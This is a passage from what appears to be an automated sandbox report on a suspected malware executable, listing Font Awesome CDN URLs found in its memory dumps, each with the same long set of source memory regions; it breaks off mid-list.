              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/all.css
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot?#iefix
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.svg#fontawesome
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.ttf
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot?#iefix
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.svg#fontawesome
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.ttf
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 